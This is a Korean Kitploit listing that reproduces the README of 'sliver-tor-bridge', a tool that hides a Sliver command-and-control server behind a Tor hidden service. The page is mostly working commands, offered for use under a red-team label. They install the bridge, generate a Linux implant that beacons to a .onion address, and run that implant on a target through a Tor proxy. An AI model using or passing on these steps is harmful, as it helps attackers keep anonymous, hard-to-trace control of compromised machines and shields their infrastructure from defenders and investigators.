Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
sliver-tor-bridge — Sliver C2를 위한 Tor 전송 브리지 - 익명 명령 및 제어 | Kitploit
도구/GitHubGitHub/otsmane-ahmed/sliver-tor-bridge
Payload GenerationNetwork SecurityPenetration TestingCommand and ControlRed Teaming
GitHubotsmane-ahmed/sliver-tor-bridge

sliver-tor-bridge

Sliver C2를 위한 Tor 전송 브리지 - 익명 명령 및 제어

저장소 보기
60837개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Python License Docker Sliver

sliver-tor-bridge

Sliver C2를 위한 Tor 기반 전송 브릿지입니다. 은닉 서비스를 생성하고 트래픽을 Sliver 서버로 프록시하여 실제 IP가 노출되지 않도록 합니다.

기능

Tor 은닉 서비스를 설정하여 로컬 HTTP 프록시를 가리킵니다. 프록시는 모든 트래픽을 Sliver의 HTTPS 리스너로 전달합니다. 임플란트는 Tor를 통해 연결되며, 관리자는 평소처럼 Sliver를 통해 제어합니다.

root@kitploit:~
sliver server <---> proxy <---> tor hidden service <---> implant
   :8443           :8080          xyz.onion              (via tor)

사용 이유

  • C2 서버 IP가 Tor 뒤에 숨겨집니다.
  • 임플란트는 .onion 주소만 알 뿐 실제 IP는 모릅니다.
  • 기본 Sliver와 함께 작동하며, 수정이 필요 없습니다.
  • 간단한 Python 설정으로, Go 컴파일이 필요하지 않습니다.

요구 사항

  • python 3.8+
  • tor (apt install tor)
  • sliver (https://sliver.sh)

설치

root@kitploit:~
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .

사용법

HTTPS 리스너로 Sliver를 시작합니다:

root@kitploit:~
sliver-client
sliver > https -L 127.0.0.1 -l 8443

다른 터미널에서 브릿지를 시작합니다:

root@kitploit:~
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443

출력은 다음과 유사합니다:

root@kitploit:~
[+] Tor started successfully!
[+] Hidden Service: http://abc123xyz.onion
[+] Bridge is READY!

.onion 주소를 기다린 후 임플란트를 생성합니다:

root@kitploit:~
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/implant

대상에서 임플란트를 실행합니다 (Tor 필요):

root@kitploit:~
HTTP_PROXY=socks5h://127.0.0.1:9050 ./implant

CLI 옵션

root@kitploit:~
sliver-tor-bridge start [OPTIONS]

--sliver-port    sliver https port (default 8443)
--tor-port       tor socks port (default 9050)
--service-port   hidden service port (default 80)
-c, --config     config file path

기타 명령어:

root@kitploit:~
sliver-tor-bridge status    # check if hidden service is running
sliver-tor-bridge stop      # clean up hidden service directory

작동 방식

root@kitploit:~
graph LR
    Implant[Implant] -->|Tor Network| HS["Hidden Service (.onion)"]
    HS -->|TCP :8080| Proxy["Bridge Proxy"]
    Proxy -->|HTTPS :8443| Sliver["Sliver Server"]
  1. Tor 관리자가 Tor 프로세스를 시작하고 은닉 서비스를 생성합니다.
  2. 은닉 서비스는 localhost:8080(프록시)을 가리킵니다.
  3. Flask 프록시는 8080에서 수신 대기하고 요청을 localhost:8443의 Sliver로 전달합니다.
  4. Sliver는 평소처럼 임플란트 통신을 처리합니다.

브릿지는 중간에 위치하여 트래픽을 중계합니다. Sliver는 정상적인 HTTPS 연결을 받는다고 생각합니다. 임플란트는 일반 HTTP 서버와 통신한다고 생각합니다.

Docker

root@kitploit:~
docker-compose up -d
docker-compose logs -f

테스트

root@kitploit:~
pip install pytest
pytest tests/

파일 구조

root@kitploit:~
sliver_tor_bridge/
  cli.py          # 명령줄 인터페이스
  tor_manager.py  # Tor 시작 및 은닉 서비스 생성
  proxy.py        # Sliver로 전달하는 Flask 앱
  config.py       # 설정 처리

문제 해결

Tor가 시작되지 않음: 시스템 Tor를 중지했는지 확인하세요 (sudo systemctl stop tor)

연결 시간 초과: Tor 부트스트랩은 1~3분 정도 소요될 수 있습니다. 100%가 될 때까지 기다리세요.

임플란트가 연결되지 않음: 임플란트가 Tor에 접근 가능한지 확인하세요 (socks 프록시 9050)

라이선스

MIT

도구 다운로드